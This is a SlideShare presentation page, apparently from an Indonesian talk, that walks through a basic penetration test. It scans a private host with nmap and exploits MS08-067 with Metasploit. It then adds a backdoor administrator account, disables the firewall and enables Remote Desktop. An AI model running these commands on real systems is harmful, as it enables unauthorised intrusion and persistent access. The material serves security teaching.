SlideShare a Scribd company logo
1 of 15
Download to read offline
{network security part 1}
 Penetration test sederhana dengan mobile device...




    http://www.flickr.com/photos/32615508@N02/3047982712
{network scan}
Host discovery, find the targets
StumblerPlus , iWep PRO
iNet , Snap:
Mobile version of pinger/scanner (ex: Angry IP Scanner)
{deeper profiling}
 Port scanning, OS detection etc.
Nmap 5.00
Jailbroken iPhone etc.

$> nmap -O 192.168.5.44

Aha, microsoft-ds (port 445)
plus XP SP2...
Or else...

$> nmap -p 445 192.168.5.0/24
{penetrations}
    Using exploits etc.
Metasploit Framework

$> msfconsole

Easy, many modules, reular
updates, Ruby, can run nmap too.
Use Proper Modules

$> use windows/smb/ms08_067_netapi
$> show options
$> show payloads

Security knowledge & deduction
Set Options

$> set payload windows/shell_bind_tcp
$> set rhost 192.168.5.44
$> exploit
Welcome to C: Prompt

$> ipconfig
$> dir
$> net user
$> net user guestboss guestboss /add
$> net localgroup Administrators /add guestboss
$> echo “P4wned!” > "c:Documents and
SettingsguestbossDesktopHello.txt"
Shutdown Firewalll & Enable RDP

$> set opmode mode = DISABLE exceptions = ENABLE

$> reg add "HKEY_LOCAL_MACHINESYSTEMCurrentControlSetControlTerminal
Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f

$> net localgroup "Remote Desktop Users" /add guestboss
{conclusions?}
    ..............................
Q&A

More Related Content

What's hot

Metasploit - Basic and Android Demo
Metasploit  - Basic and Android DemoMetasploit  - Basic and Android Demo
Metasploit - Basic and Android DemoArpit Agarwal
 
Metasploit For Beginners
Metasploit For BeginnersMetasploit For Beginners
Metasploit For BeginnersRamnath Shenoy
 
Windows xp compromise and remedies
Windows xp compromise and remediesWindows xp compromise and remedies
Windows xp compromise and remediesBikrant Gautam
 
Snort Home Lab - Workshop
Snort Home Lab - Workshop Snort Home Lab - Workshop
Snort Home Lab - Workshop Hishan Shouketh
 
SELinux Kernel Internals and Architecture - FOSS.IN/2005
SELinux Kernel Internals and Architecture - FOSS.IN/2005SELinux Kernel Internals and Architecture - FOSS.IN/2005
SELinux Kernel Internals and Architecture - FOSS.IN/2005James Morris
 
Recon with Nmap
Recon with Nmap Recon with Nmap
Recon with Nmap OWASP Delhi
 
Network Penetration Testing Toolkit - Nmap, Netcat, and Metasploit Basics
Network Penetration Testing Toolkit - Nmap, Netcat, and Metasploit BasicsNetwork Penetration Testing Toolkit - Nmap, Netcat, and Metasploit Basics
Network Penetration Testing Toolkit - Nmap, Netcat, and Metasploit BasicsBishop Fox
 
Metasploit for Penetration Testing: Beginner Class
Metasploit for Penetration Testing: Beginner ClassMetasploit for Penetration Testing: Beginner Class
Metasploit for Penetration Testing: Beginner ClassGeorgia Weidman
 
Vulnerability, exploit to metasploit
Vulnerability, exploit to metasploitVulnerability, exploit to metasploit
Vulnerability, exploit to metasploitTiago Henriques
 
N map presentation
N map presentationN map presentation
N map presentationulirraptor
 
Perl Usage In Security and Penetration testing
Perl Usage In Security and Penetration testingPerl Usage In Security and Penetration testing
Perl Usage In Security and Penetration testingVlatko Kosturjak
 

What's hot (20)

Metasploit - Basic and Android Demo
Metasploit  - Basic and Android DemoMetasploit  - Basic and Android Demo
Metasploit - Basic and Android Demo
 
Metasploit For Beginners
Metasploit For BeginnersMetasploit For Beginners
Metasploit For Beginners
 
Windows xp compromise and remedies
Windows xp compromise and remediesWindows xp compromise and remedies
Windows xp compromise and remedies
 
Snort Home Lab - Workshop
Snort Home Lab - Workshop Snort Home Lab - Workshop
Snort Home Lab - Workshop
 
Pentest with Metasploit
Pentest with MetasploitPentest with Metasploit
Pentest with Metasploit
 
SELinux Kernel Internals and Architecture - FOSS.IN/2005
SELinux Kernel Internals and Architecture - FOSS.IN/2005SELinux Kernel Internals and Architecture - FOSS.IN/2005
SELinux Kernel Internals and Architecture - FOSS.IN/2005
 
Recon with Nmap
Recon with Nmap Recon with Nmap
Recon with Nmap
 
Dynamic Port Scanning
Dynamic Port ScanningDynamic Port Scanning
Dynamic Port Scanning
 
Network Penetration Testing Toolkit - Nmap, Netcat, and Metasploit Basics
Network Penetration Testing Toolkit - Nmap, Netcat, and Metasploit BasicsNetwork Penetration Testing Toolkit - Nmap, Netcat, and Metasploit Basics
Network Penetration Testing Toolkit - Nmap, Netcat, and Metasploit Basics
 
Metasploit for Penetration Testing: Beginner Class
Metasploit for Penetration Testing: Beginner ClassMetasploit for Penetration Testing: Beginner Class
Metasploit for Penetration Testing: Beginner Class
 
NMAP - The Network Scanner
NMAP - The Network ScannerNMAP - The Network Scanner
NMAP - The Network Scanner
 
Vulnerability, exploit to metasploit
Vulnerability, exploit to metasploitVulnerability, exploit to metasploit
Vulnerability, exploit to metasploit
 
N map presentation
N map presentationN map presentation
N map presentation
 
Metasploit Basics
Metasploit BasicsMetasploit Basics
Metasploit Basics
 
Hacking 101
Hacking 101Hacking 101
Hacking 101
 
Nmap commands
Nmap commandsNmap commands
Nmap commands
 
Nmap and metasploitable
Nmap and metasploitableNmap and metasploitable
Nmap and metasploitable
 
Perl Usage In Security and Penetration testing
Perl Usage In Security and Penetration testingPerl Usage In Security and Penetration testing
Perl Usage In Security and Penetration testing
 
Metasploit
MetasploitMetasploit
Metasploit
 
NMap
NMapNMap
NMap
 

Viewers also liked

Fit 23 mysql
Fit 23 mysqlFit 23 mysql
Fit 23 mysqlchephz DJ
 
Fit 08 wawan_testing aplikasi
Fit 08 wawan_testing aplikasiFit 08 wawan_testing aplikasi
Fit 08 wawan_testing aplikasichephz DJ
 
Fit 17 agus - speaking rules
Fit 17   agus - speaking rulesFit 17   agus - speaking rules
Fit 17 agus - speaking ruleschephz DJ
 
Dchoice band profile
Dchoice band profileDchoice band profile
Dchoice band profilechephz DJ
 
Fit 23 persentasi fit lukman
Fit 23 persentasi fit lukmanFit 23 persentasi fit lukman
Fit 23 persentasi fit lukmanchephz DJ
 
Fit 06 kustiana
Fit 06 kustianaFit 06 kustiana
Fit 06 kustianachephz DJ
 
Testing aplikasi2
Testing aplikasi2Testing aplikasi2
Testing aplikasi2chephz DJ
 
Fit 14 : sampah
Fit 14 : sampahFit 14 : sampah
Fit 14 : sampahchephz DJ
 
Fit 11 surat kuasa pp
Fit 11 surat kuasa ppFit 11 surat kuasa pp
Fit 11 surat kuasa ppchephz DJ
 
Fit 01 cecep_fit
Fit 01 cecep_fitFit 01 cecep_fit
Fit 01 cecep_fitchephz DJ
 
Fit 16 mutia - gangguan mental yang disebabkan oleh internet
Fit 16   mutia - gangguan mental yang disebabkan oleh internetFit 16   mutia - gangguan mental yang disebabkan oleh internet
Fit 16 mutia - gangguan mental yang disebabkan oleh internetchephz DJ
 
Fit 07 fauzi_google
Fit 07 fauzi_googleFit 07 fauzi_google
Fit 07 fauzi_googlechephz DJ
 
FIT 10 - Hargun - Cyberoam
FIT 10 - Hargun - CyberoamFIT 10 - Hargun - Cyberoam
FIT 10 - Hargun - Cyberoamchephz DJ
 
Fit 13 : Kenakalan Remaja di Era Informatika
Fit 13 : Kenakalan Remaja di Era InformatikaFit 13 : Kenakalan Remaja di Era Informatika
Fit 13 : Kenakalan Remaja di Era Informatikachephz DJ
 
Fit 15 ambie 2012
Fit 15 ambie   2012Fit 15 ambie   2012
Fit 15 ambie 2012chephz DJ
 
Fit 14 bangga_dasar_linux
Fit 14 bangga_dasar_linuxFit 14 bangga_dasar_linux
Fit 14 bangga_dasar_linuxchephz DJ
 
Fit 09 retno_googling
Fit 09 retno_googlingFit 09 retno_googling
Fit 09 retno_googlingchephz DJ
 
Fit 06 kustiana
Fit 06 kustianaFit 06 kustiana
Fit 06 kustianachephz DJ
 

Viewers also liked (20)

Fit 23 mysql
Fit 23 mysqlFit 23 mysql
Fit 23 mysql
 
Fit 08 wawan_testing aplikasi
Fit 08 wawan_testing aplikasiFit 08 wawan_testing aplikasi
Fit 08 wawan_testing aplikasi
 
Fit 17 agus - speaking rules
Fit 17   agus - speaking rulesFit 17   agus - speaking rules
Fit 17 agus - speaking rules
 
Dchoice band profile
Dchoice band profileDchoice band profile
Dchoice band profile
 
Fit 06 aban
Fit 06 abanFit 06 aban
Fit 06 aban
 
Fit 23 persentasi fit lukman
Fit 23 persentasi fit lukmanFit 23 persentasi fit lukman
Fit 23 persentasi fit lukman
 
Fit 06 kustiana
Fit 06 kustianaFit 06 kustiana
Fit 06 kustiana
 
Testing aplikasi2
Testing aplikasi2Testing aplikasi2
Testing aplikasi2
 
Fit 14 : sampah
Fit 14 : sampahFit 14 : sampah
Fit 14 : sampah
 
Fit 11 surat kuasa pp
Fit 11 surat kuasa ppFit 11 surat kuasa pp
Fit 11 surat kuasa pp
 
Fit 01 cecep_fit
Fit 01 cecep_fitFit 01 cecep_fit
Fit 01 cecep_fit
 
Fit 16 mutia - gangguan mental yang disebabkan oleh internet
Fit 16   mutia - gangguan mental yang disebabkan oleh internetFit 16   mutia - gangguan mental yang disebabkan oleh internet
Fit 16 mutia - gangguan mental yang disebabkan oleh internet
 
Fit 07 fauzi_google
Fit 07 fauzi_googleFit 07 fauzi_google
Fit 07 fauzi_google
 
FIT 10 - Hargun - Cyberoam
FIT 10 - Hargun - CyberoamFIT 10 - Hargun - Cyberoam
FIT 10 - Hargun - Cyberoam
 
Fit 13 : Kenakalan Remaja di Era Informatika
Fit 13 : Kenakalan Remaja di Era InformatikaFit 13 : Kenakalan Remaja di Era Informatika
Fit 13 : Kenakalan Remaja di Era Informatika
 
Fit 15 ambie 2012
Fit 15 ambie   2012Fit 15 ambie   2012
Fit 15 ambie 2012
 
Fit 14 bangga_dasar_linux
Fit 14 bangga_dasar_linuxFit 14 bangga_dasar_linux
Fit 14 bangga_dasar_linux
 
Fit 09 retno_googling
Fit 09 retno_googlingFit 09 retno_googling
Fit 09 retno_googling
 
Fit 06 kustiana
Fit 06 kustianaFit 06 kustiana
Fit 06 kustiana
 
Resiliency-Part One -11-3-2015
Resiliency-Part One -11-3-2015Resiliency-Part One -11-3-2015
Resiliency-Part One -11-3-2015
 

Similar to Fit 13 penetration test 1

Security & ethical hacking p2
Security & ethical hacking p2Security & ethical hacking p2
Security & ethical hacking p2ratnalajaggu
 
Internal and External threats to a corporate network : Bypassing perimeter de...
Internal and External threats to a corporate network : Bypassing perimeter de...Internal and External threats to a corporate network : Bypassing perimeter de...
Internal and External threats to a corporate network : Bypassing perimeter de...EyesOpen Association
 
Security & ethical hacking
Security & ethical hackingSecurity & ethical hacking
Security & ethical hackingAmanpreet Singh
 
Lab-5 Scanning and Enumeration Reconnaissance and inform.docx
Lab-5 Scanning and Enumeration        Reconnaissance and inform.docxLab-5 Scanning and Enumeration        Reconnaissance and inform.docx
Lab-5 Scanning and Enumeration Reconnaissance and inform.docxLaticiaGrissomzz
 
Intro to exploits in metasploitand payloads in msfvenom
Intro to exploits in metasploitand payloads in msfvenomIntro to exploits in metasploitand payloads in msfvenom
Intro to exploits in metasploitand payloads in msfvenomSiddharth Krishna Kumar
 
Positive Hack Days. Pavlov. Network Infrastructure Security Assessment
Positive Hack Days. Pavlov. Network Infrastructure Security AssessmentPositive Hack Days. Pavlov. Network Infrastructure Security Assessment
Positive Hack Days. Pavlov. Network Infrastructure Security AssessmentPositive Hack Days
 
Penetrating Windows 8 with syringe utility
Penetrating Windows 8 with syringe utilityPenetrating Windows 8 with syringe utility
Penetrating Windows 8 with syringe utilityIOSR Journals
 
Hacking in shadows By - Raghav Bisht
Hacking in shadows By - Raghav BishtHacking in shadows By - Raghav Bisht
Hacking in shadows By - Raghav BishtRaghav Bisht
 
Shall we play a game?
Shall we play a game?Shall we play a game?
Shall we play a game?Maciej Lasyk
 
Virtualization and automation of library software/machines + Puppet
Virtualization and automation of library software/machines + PuppetVirtualization and automation of library software/machines + Puppet
Virtualization and automation of library software/machines + PuppetOmar Reygaert
 
Network Vulnerabilities And Cyber Kill Chain Essay
Network Vulnerabilities And Cyber Kill Chain EssayNetwork Vulnerabilities And Cyber Kill Chain Essay
Network Vulnerabilities And Cyber Kill Chain EssayKaren Oliver
 
Python and Machine Learning
Python and Machine LearningPython and Machine Learning
Python and Machine Learningtrygub
 
Kali Linux - Falconer
Kali Linux - FalconerKali Linux - Falconer
Kali Linux - FalconerTony Godfrey
 
74 Methods for Privilege Escalation Part 2
74 Methods for Privilege Escalation Part 274 Methods for Privilege Escalation Part 2
74 Methods for Privilege Escalation Part 2Hadess
 
Null Delhi chapter - Feb 2019
Null Delhi chapter - Feb 2019Null Delhi chapter - Feb 2019
Null Delhi chapter - Feb 2019Nikhil Raj
 
An Express Guide ~ SNMP for Secure Rremote Resource Monitoring
An Express Guide ~ SNMP for Secure Rremote Resource MonitoringAn Express Guide ~ SNMP for Secure Rremote Resource Monitoring
An Express Guide ~ SNMP for Secure Rremote Resource MonitoringAbhishek Kumar
 
Webinar On Ethical Hacking & Cybersecurity - Day2
Webinar On Ethical Hacking & Cybersecurity - Day2Webinar On Ethical Hacking & Cybersecurity - Day2
Webinar On Ethical Hacking & Cybersecurity - Day2Mohammed Adam
 

Similar to Fit 13 penetration test 1 (20)

Security & ethical hacking p2
Security & ethical hacking p2Security & ethical hacking p2
Security & ethical hacking p2
 
Internal and External threats to a corporate network : Bypassing perimeter de...
Internal and External threats to a corporate network : Bypassing perimeter de...Internal and External threats to a corporate network : Bypassing perimeter de...
Internal and External threats to a corporate network : Bypassing perimeter de...
 
Security & ethical hacking
Security & ethical hackingSecurity & ethical hacking
Security & ethical hacking
 
Lab-5 Scanning and Enumeration Reconnaissance and inform.docx
Lab-5 Scanning and Enumeration        Reconnaissance and inform.docxLab-5 Scanning and Enumeration        Reconnaissance and inform.docx
Lab-5 Scanning and Enumeration Reconnaissance and inform.docx
 
Intro to exploits in metasploitand payloads in msfvenom
Intro to exploits in metasploitand payloads in msfvenomIntro to exploits in metasploitand payloads in msfvenom
Intro to exploits in metasploitand payloads in msfvenom
 
Nmap
NmapNmap
Nmap
 
Positive Hack Days. Pavlov. Network Infrastructure Security Assessment
Positive Hack Days. Pavlov. Network Infrastructure Security AssessmentPositive Hack Days. Pavlov. Network Infrastructure Security Assessment
Positive Hack Days. Pavlov. Network Infrastructure Security Assessment
 
The Art of Grey-Box Attack
The Art of Grey-Box AttackThe Art of Grey-Box Attack
The Art of Grey-Box Attack
 
Penetrating Windows 8 with syringe utility
Penetrating Windows 8 with syringe utilityPenetrating Windows 8 with syringe utility
Penetrating Windows 8 with syringe utility
 
Hacking in shadows By - Raghav Bisht
Hacking in shadows By - Raghav BishtHacking in shadows By - Raghav Bisht
Hacking in shadows By - Raghav Bisht
 
Shall we play a game?
Shall we play a game?Shall we play a game?
Shall we play a game?
 
Virtualization and automation of library software/machines + Puppet
Virtualization and automation of library software/machines + PuppetVirtualization and automation of library software/machines + Puppet
Virtualization and automation of library software/machines + Puppet
 
Network Vulnerabilities And Cyber Kill Chain Essay
Network Vulnerabilities And Cyber Kill Chain EssayNetwork Vulnerabilities And Cyber Kill Chain Essay
Network Vulnerabilities And Cyber Kill Chain Essay
 
Python and Machine Learning
Python and Machine LearningPython and Machine Learning
Python and Machine Learning
 
Kali Linux - Falconer
Kali Linux - FalconerKali Linux - Falconer
Kali Linux - Falconer
 
74 Methods for Privilege Escalation Part 2
74 Methods for Privilege Escalation Part 274 Methods for Privilege Escalation Part 2
74 Methods for Privilege Escalation Part 2
 
NMAP1.ppt
NMAP1.pptNMAP1.ppt
NMAP1.ppt
 
Null Delhi chapter - Feb 2019
Null Delhi chapter - Feb 2019Null Delhi chapter - Feb 2019
Null Delhi chapter - Feb 2019
 
An Express Guide ~ SNMP for Secure Rremote Resource Monitoring
An Express Guide ~ SNMP for Secure Rremote Resource MonitoringAn Express Guide ~ SNMP for Secure Rremote Resource Monitoring
An Express Guide ~ SNMP for Secure Rremote Resource Monitoring
 
Webinar On Ethical Hacking & Cybersecurity - Day2
Webinar On Ethical Hacking & Cybersecurity - Day2Webinar On Ethical Hacking & Cybersecurity - Day2
Webinar On Ethical Hacking & Cybersecurity - Day2
 

More from chephz DJ

Fit 05 sunandar_sejarah_email_dan_seluk_beluk
Fit 05 sunandar_sejarah_email_dan_seluk_belukFit 05 sunandar_sejarah_email_dan_seluk_beluk
Fit 05 sunandar_sejarah_email_dan_seluk_belukchephz DJ
 
Fit 07 ihak_pengertian_hub_switch_dan_router
Fit 07 ihak_pengertian_hub_switch_dan_routerFit 07 ihak_pengertian_hub_switch_dan_router
Fit 07 ihak_pengertian_hub_switch_dan_routerchephz DJ
 
Fit 05 awang_adsense
Fit 05 awang_adsenseFit 05 awang_adsense
Fit 05 awang_adsensechephz DJ
 
Fit 04 sandy
Fit 04 sandyFit 04 sandy
Fit 04 sandychephz DJ
 
Fit 04 reza_islam_dan_teknologi_informasi_presentasi
Fit 04 reza_islam_dan_teknologi_informasi_presentasiFit 04 reza_islam_dan_teknologi_informasi_presentasi
Fit 04 reza_islam_dan_teknologi_informasi_presentasichephz DJ
 
Fit 03 aprizal
Fit 03 aprizalFit 03 aprizal
Fit 03 aprizalchephz DJ
 
Fit 02 cecep_map
Fit 02 cecep_mapFit 02 cecep_map
Fit 02 cecep_mapchephz DJ
 
3 Basic Technic For Bass Player
3 Basic Technic For Bass Player3 Basic Technic For Bass Player
3 Basic Technic For Bass Playerchephz DJ
 

More from chephz DJ (8)

Fit 05 sunandar_sejarah_email_dan_seluk_beluk
Fit 05 sunandar_sejarah_email_dan_seluk_belukFit 05 sunandar_sejarah_email_dan_seluk_beluk
Fit 05 sunandar_sejarah_email_dan_seluk_beluk
 
Fit 07 ihak_pengertian_hub_switch_dan_router
Fit 07 ihak_pengertian_hub_switch_dan_routerFit 07 ihak_pengertian_hub_switch_dan_router
Fit 07 ihak_pengertian_hub_switch_dan_router
 
Fit 05 awang_adsense
Fit 05 awang_adsenseFit 05 awang_adsense
Fit 05 awang_adsense
 
Fit 04 sandy
Fit 04 sandyFit 04 sandy
Fit 04 sandy
 
Fit 04 reza_islam_dan_teknologi_informasi_presentasi
Fit 04 reza_islam_dan_teknologi_informasi_presentasiFit 04 reza_islam_dan_teknologi_informasi_presentasi
Fit 04 reza_islam_dan_teknologi_informasi_presentasi
 
Fit 03 aprizal
Fit 03 aprizalFit 03 aprizal
Fit 03 aprizal
 
Fit 02 cecep_map
Fit 02 cecep_mapFit 02 cecep_map
Fit 02 cecep_map
 
3 Basic Technic For Bass Player
3 Basic Technic For Bass Player3 Basic Technic For Bass Player
3 Basic Technic For Bass Player
 

Fit 13 penetration test 1